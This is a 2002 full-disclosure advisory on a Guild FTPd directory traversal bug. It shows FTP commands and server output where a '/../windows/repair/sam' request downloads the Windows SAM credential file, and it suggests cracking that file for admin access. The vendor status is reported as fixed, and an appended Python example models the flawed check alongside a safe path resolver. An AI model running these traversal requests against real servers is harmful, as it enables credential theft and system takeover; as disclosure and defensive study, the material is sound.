From: full-disclosure at mike-c.com (Mike C)
Subject: Guild FTPd Exploit

______________________________________________________________________
Product Information

Guild FTPd 0.999.5
Released 4th July 2002
http://www.nitrolic.com

Guild FTPd is an ftp server which is growing ever more popular due to
its link with IRC. It can detect if the people on your FTP are in
the same channels you are, and kick/ban them accordingly.  This is
useful if you wish to keep your ftp data a little more private.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
____________________________________________________________
Exploit Information

Author: Mike C
Date:   7th September 2002

Description:
Using a simple exploit in Guild FTPd, we can download any
file on the same hard drive as the ftp root folder.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
__________________________________________________
SAM SECURITY FILE
LOCAL PATH      =  C:\windows\repair\sam
FTP ROOT        =  C:\ftp
RELATIVE PATH   =  ../windows/repair/sam
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

1) We try to download the sam file using a relative path to the ftp root


ftp> GET "../windows/repair/sam" c:\sam
200 PORT command successful.
150 Opening ascii mode data connection for /../windows/repair/sam (24576
bytes).
425 Download failed.
ftp>


2) We get a 'Download failed' message, along with a filesize,
   confirming the file exists.  If the file doesn't exist, we get
   'Access denied: File not found.'


3) Adding a / to the start of the relative path seems to bypass the
   server's security relating to relative URLs.  Note however,
   that / doesn't escape the ftp root as you may expect.
   Where '../foo.bar' is not accessible, '/../foo.bar' is.


ftp> GET "/../windows/repair/sam" c:\sam
200 PORT command successful.
150 Opening ascii mode data connection for /../windows/repair/sam (24576
bytes).
226 Transfer complete. 24576 bytes in 1 sec. (24.58 Kb/s).
ftp: 24576 bytes received in 2.08Seconds 11.80Kbytes/sec.
ftp>


4) We have just successfully exploited the server, managing to
   download the system's sam file.  An application such as l0phtcrack
   (http://www.atstake.com/research/lc/) could now be used to find
   the passwords, thus giving full administrative access to the
   exploited system.
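The defect the four steps above describe is a containment check that rejects a request beginning with '..' but not one beginning with '/..'. As an added example (not code from the original post, nor Guild FTPd's own source, which is not public here), the Python below models that flawed check next to a resolver that walks the requested path segment by segment and refuses any request that would rise above the FTP root; FTP_ROOT, the function names and the sample requests are assumptions for illustration.

```python
import os
import posixpath

# Constructed example root, matching the layout in the advisory.
FTP_ROOT = "C:/ftp"


def naive_is_allowed(requested):
    """Hypothetical reconstruction of the flawed check: it refuses a path that
    *starts* with '..', so a leading '/' slips past it (the bypass in step 3)."""
    return not requested.startswith("..")


def resolve_virtual_path(requested, root=FTP_ROOT):
    """Map an FTP request onto a real path under root.

    The path is treated as virtual and resolved lexically, segment by
    segment.  Any '..' that would pop above the root is rejected outright
    rather than silently dropped, so '../x' and '/../x' are handled alike.
    Returns the resolved path, or None if the request escapes the root.
    """
    # Windows clients may send backslashes; treat them as separators too.
    segments = requested.replace("\\", "/").split("/")
    stack = []
    for seg in segments:
        if seg in ("", "."):
            continue                 # empty (from '/' or '//') or current dir
        if seg == "..":
            if not stack:
                return None          # would rise above the root: refuse
            stack.pop()
            continue
        stack.append(seg)
    return posixpath.join(root, *stack) if stack else root


def is_within_root(candidate, root=FTP_ROOT):
    """Defence in depth: after lexical resolution, confirm the absolute
    candidate still shares the root as its common prefix."""
    root_abs = os.path.abspath(root)
    cand_abs = os.path.abspath(candidate)
    try:
        return os.path.commonpath([root_abs, cand_abs]) == root_abs
    except ValueError:               # e.g. different drives on Windows
        return False


def check_request(requested, root=FTP_ROOT):
    """Full server-side decision: True if the request may be served."""
    resolved = resolve_virtual_path(requested, root)
    return resolved is not None and is_within_root(resolved, root)


if __name__ == "__main__":
    # Constructed sample requests, the two from the advisory plus benign ones.
    for req in ["../windows/repair/sam", "/../windows/repair/sam",
                "pub/../readme.txt", "/pub/readme.txt", "pub\\..\\..\\x"]:
        print(f"{req!r:30} naive={naive_is_allowed(req)!s:5} "
              f"resolved={resolve_virtual_path(req)} ok={check_request(req)}")
```

The point of resolving explicitly instead of calling a library normaliser is that `posixpath.normpath("/../windows/repair/sam")` quietly returns `/windows/repair/sam`, turning a hostile request into a plausible-looking one; refusing on the first out-of-root `..` keeps the decision visible and loggable.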

______________________________________________________________________
Vendor Status:

The authors of Guild FTPd were notified on 7th September 2002.
The exploit has been fixed as of 8th September 2002.
A new version will be released on 15th September 2002.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯

